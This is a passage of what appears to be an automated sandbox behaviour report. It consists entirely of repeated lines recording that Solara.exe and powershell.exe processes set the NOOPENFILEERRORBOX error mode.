                Source: C:\Users\user\Desktop\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
